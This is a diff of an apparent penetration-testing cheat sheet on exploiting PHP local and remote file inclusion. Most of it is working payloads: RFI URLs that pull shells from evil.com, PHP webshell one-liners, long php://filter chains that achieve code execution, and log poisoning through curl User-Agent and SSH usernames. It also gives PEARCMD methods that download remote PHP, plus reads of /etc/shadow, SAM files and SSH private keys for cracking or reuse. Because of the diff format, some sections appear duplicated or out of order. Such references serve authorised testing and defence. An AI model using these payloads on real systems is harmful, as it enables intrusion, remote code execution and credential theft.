-  * [Wrapper expect://](#wrapper-expect)
+    - [Bypass allow_url_include](#bypass-allow_url_include)
-  * [Wrapper input://](#wrapper-input)
+  - [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper phar://](#wrapper-phar)
+    - [Wrapper php://filter](#wrapper-phpfilter)
-* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
+    - [Wrapper data://](#wrapper-data)
-* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
+    - [Wrapper expect://](#wrapper-expect)
-* [LFI to RCE via upload](#lfi-to-rce-via-upload)
+    - [Wrapper input://](#wrapper-input)
-* [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
+    - [Wrapper zip://](#wrapper-zip)
-* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
+    - [Wrapper phar://](#wrapper-phar)
-* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
+    - [Wrapper convert.iconv:// and dechunk://](#wrapper-converticonv-and-dechunk)
-* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+  - [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
-* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files)
+  - [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
  - [LFI to RCE via upload](#lfi-to-rce-via-upload)
  - [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
  - [LFI to RCE via upload (FindFirstFile)](#lfi-to-rce-via-upload-findfirstfile)
  - [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
  - [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
    - [RCE via SSH](#rce-via-ssh)
    - [RCE via Mail](#rce-via-mail)
    - [RCE via Apache logs](#rce-via-apache-logs)
  - [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
  - [LFI to RCE via PHP PEARCMD](#lfi-to-rce-via-php-pearcmd)
  - [LFI to RCE via credentials files](#lfi-to-rce-via-credentials-files)
  - [References](#references)
 ## Tools
 * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
 * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
 * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
 * [panoptic - https://github.com/lightos/Panoptic](https://github.com/lightos/Panoptic)
-## Basic LFI
+
 ## Local File Inclusion
 Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
 ```php
 <?php
 $file = $_GET['page'];
 include($file);
 ?>
 ```
 In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
@@ -46,7 +69,7 @@ http://example.com/index.php?page=../../../etc/passwd
 ### Null byte
-:warning: In versions of PHP below 5.3 we can terminate with null byte.
+:warning: In versions of PHP below 5.3.4 we can terminate with null byte.
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
@@ -68,7 +91,7 @@ http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/pas
 ### Path and dot truncation
-On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
+On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
@@ -85,7 +108,17 @@ http://example.com/index.php?page=..///////..////..//////etc/passwd
 http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
 ```
-## Basic RFI
+
 ## Remote File Inclusion
 > Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
 Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP5.
 ```ini
 allow_url_include = On
 ```
 Most of the filter bypasses from LFI section can be reused for RFI.
@@ -99,12 +132,14 @@ http://example.com/index.php?page=http://evil.com/shell.txt
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
 ### Double encoding
 ```powershell
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 ### Bypass allow_url_include
 When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
@@ -118,37 +153,47 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
 ### Wrapper php://filter
-The part "php://filter" is case insensitive
+The part "`php://filter`" is case insensitive
 ```powershell
 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 ```
-can be chained with a compression wrapper for large files.
+Wrappers can be chained with a compression wrapper for large files.
 ```powershell
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
-NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times using `|` or `/`: 
 - Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
 - deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
 ```powershell
 ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
 curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
 ```
-### Wrapper zip://
+Also there is a way to turn the `php://filter` into a full RCE. 
-```python
+* [synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator) - A CLI to generate PHP filters chain
-echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
+  ```powershell
-zip payload.zip payload.php;
+  $ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?>'
-mv payload.zip shell.jpg;
+  [+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+)
-rm payload.php
+  php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
  ```
 * [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.
  ```powershell
  # vulnerable file: index.php
  # vulnerable parameter: file
  # executed command: id
  # executed PHP code: <?=`$_GET[0]`;;?>
  curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
  ```
 http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ```
 ### Wrapper data://
@@ -159,6 +204,7 @@ NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
 ### Wrapper expect://
 ```powershell
@@ -166,6 +212,7 @@ http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
 ```
 ### Wrapper input://
 Specify your payload in the POST parameters, this can be done with a simple `curl` command.
@@ -180,6 +227,18 @@ Alternatively, Kadimus has a module to automate this attack.
 ./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input
 ```
 ### Wrapper zip://
 1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
 2. Zip the file
  ```python
  zip payload.zip payload.php;
  mv payload.zip shell.jpg;
  rm payload.php
  ```
 3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ### Wrapper phar://
 Create a phar file with a serialized object in its meta-data.
@@ -213,11 +272,69 @@ include('phar://test.phar');
 NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
 ### Wrapper convert.iconv:// and dechunk://
 #### Leak file content from error-based oracle
 - `convert.iconv://`: convert input into another folder (`convert.iconv.utf-16le.utf-8`)
 - `dechunk://`: if the string contains no newlines, it will wipe the entire string if and only if
 the string starts with A-Fa-f0-9
 The goal of this exploitation is to leak the content of a file, one character at a time, based on the [DownUnderCTF](https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py) writeup.
 **Requirements**:
 - Backend must not use `file_exists` or `is_file`.
 - Vulnerable parameter should be in a `POST` request. 
  - You can't leak more than 135 characters in a GET request due to the size limit
 The exploit chain is based on PHP filters: `iconv` and `dechunk`:
 1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
 2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
 3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
 Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
 ```ps1
 $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0   
 [*] The following URL is targeted : http://127.0.0.1
 [*] The following local file is leaked : /test
 [*] Running POST requests
 [+] File /test leak is finished!
 ```
 #### Leak file content inside a custom format output
 * [ambionics/wrapwrap](https://github.com/ambionics/wrapwrap) - Generates a `php://filter` chain that adds a prefix and a suffix to the contents of a file.
 To obtain the contents of some file, we would like to have: `{"message":"<file contents>"}`.
 ```ps1
 ./wrapwrap.py /etc/passwd 'PREFIX' 'SUFFIX' 1000
 ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
 ./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000
 ```
 This can be used against vulnerable code like the following.
 ```php
 <?php
  $data = file_get_contents($_POST['url']);
  $data = json_decode($data);
  echo $data->message;
 ?>
 ```
 ## LFI to RCE via /proc/*/fd
 1. Upload a lot of shells (for example : 100)
 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
 ## LFI to RCE via /proc/self/environ
 Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
@@ -227,6 +344,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: <?=phpinfo(); ?>
 ```
 ## LFI to RCE via upload
 If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
@@ -237,10 +355,11 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
 ## LFI to RCE via upload (race)
-Worlds Quitest Let's Play"
+
 * Upload a file and trigger a self-inclusion.
-* Repeat 1 a shitload of time to:
+* Repeat the upload a shitload of time to:
 * increase our odds of winning the race
 * increase our guessing odds
 * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
@@ -269,10 +388,29 @@ print('[x] Something went wrong, please try again')
 ```
 ## LFI to RCE via upload (FindFirstFile)
 :warning: Only works on Windows
 `FindFirstFile` allows using masks (`<<` as `*` and `>` as `?`) in LFI paths on Windows. A mask is essentially a search pattern that can include wildcard characters, allowing users or developers to search for files or directories based on partial names or types. In the context of FindFirstFile, masks are used to filter and match the names of files or directories.
 * `*`/`<<` : Represents any sequence of characters.
 * `?`/`>` : Represents any single character.
 Upload a file, it should be stored in the temp folder `C:\Windows\Temp\` with a generated name like `php[A-F0-9]{4}.tmp`.
 Then either bruteforce the 65536 filenames or use a wildcard character like: `http://site/vuln.php?inc=c:\windows\temp\php<<`
 ## LFI to RCE via phpinfo()
-https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**.
-Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
+
 > By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
 Use the script [phpInfoLFI.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
 ## LFI to RCE via controlled log file
@@ -281,6 +419,8 @@ Just append your PHP code into the log file by doing a request to the service (A
 ```powershell
 http://example.com/index.php?page=/var/log/apache/access.log
 http://example.com/index.php?page=/var/log/apache/error.log
 http://example.com/index.php?page=/var/log/apache2/access.log
 http://example.com/index.php?page=/var/log/apache2/error.log
 http://example.com/index.php?page=/var/log/nginx/access.log
 http://example.com/index.php?page=/var/log/nginx/error.log
 http://example.com/index.php?page=/var/log/vsftpd.log
@@ -291,6 +431,7 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 ### RCE via SSH
 Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.
@@ -305,6 +446,7 @@ Then include the SSH log files inside the Web Application.
 http://example.com/index.php?page=/var/log/auth.log&cmd=id
 ```
 ### RCE via Mail
 First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
@@ -334,6 +476,24 @@ In some cases you can also send the email with the `mail` command line.
 mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
 ```
 ### RCE via Apache logs
 Poison the User-Agent in access logs:
 ```
 $ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
 ```
 Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
 Then request the logs via the LFI and execute your command.
 ```
 $ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
 ```
 ## LFI to RCE via PHP sessions
 Check if the website use PHP Session (PHPSESSID)
@@ -343,7 +503,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
 Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
 ```
-In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
+In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/sessions/sess_[PHPSESSID] files
 ```javascript
 /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
@@ -362,10 +522,58 @@ Use the LFI to include the PHP session file
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
 ## LFI to RCE via PHP PEARCMD
 PEAR is a framework and distribution system for reusable PHP components. By default `pearcmd.php` is installed in every Docker PHP image from [hub.docker.com](https://hub.docker.com/_/php) in `/usr/local/lib/php/pearcmd.php`. 
 The file `pearcmd.php` uses `$_SERVER['argv']` to get its arguments. The directive `register_argc_argv` must be set to `On` in PHP configuration (`php.ini`) for this attack to work.
 ```ini
 register_argc_argv = On
 ```
 There are this ways to exploit it.
 * Method 1: config create
  ```ps1
  /vuln.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_GET['cmd'])?>+/tmp/exec.php
  /vuln.php?file=/tmp/exec.php&cmd=phpinfo();die();
  ```
 * Method 2: man_dir
  ```ps1
  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
  /vuln.php?file=/tmp/exec.php&c=id
  ```
  The created configuration file contains the webshell.
  ```php
  #PEAR_Config 0.9
  a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
  ```
 * Method 3: download
  Need external network connection.
  ```ps1
  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://<ip>:<port>/exec.php
  /vuln.php?file=exec.php&c=id
  ```
 * Method 4: install
  Need external network connection.
  Notice that `exec.php` locates at `/tmp/pear/download/exec.php`.
  ```ps1
  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://<ip>:<port>/exec.php
  /vuln.php?file=/tmp/pear/download/exec.php&c=id
  ```
 ## LFI to RCE via credentials files
 This method require high privileges inside the application in order to read the sensitive files.
 ### Windows version
 First extract `sam` and `system` files.
@@ -377,6 +585,7 @@ http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
 Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
 ### Linux version
 First extract `/etc/shadow` files.
@@ -387,6 +596,10 @@ http://example.com/index.php?page=../../../../../../etc/shadow
 Then crack the hashes inside in order to login via SSH on the machine.
 Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa.
 If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `/<HOME>/.ssh/id_rsa`.
 ## References
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
@@ -396,11 +609,18 @@ Then crack the hashes inside in order to login via SSH on the machine.
 * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
 * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
 * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
+* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
 * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
-* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
+* [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379)
 * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
+* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
 * [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 * [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
 * [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
 * [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 * [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
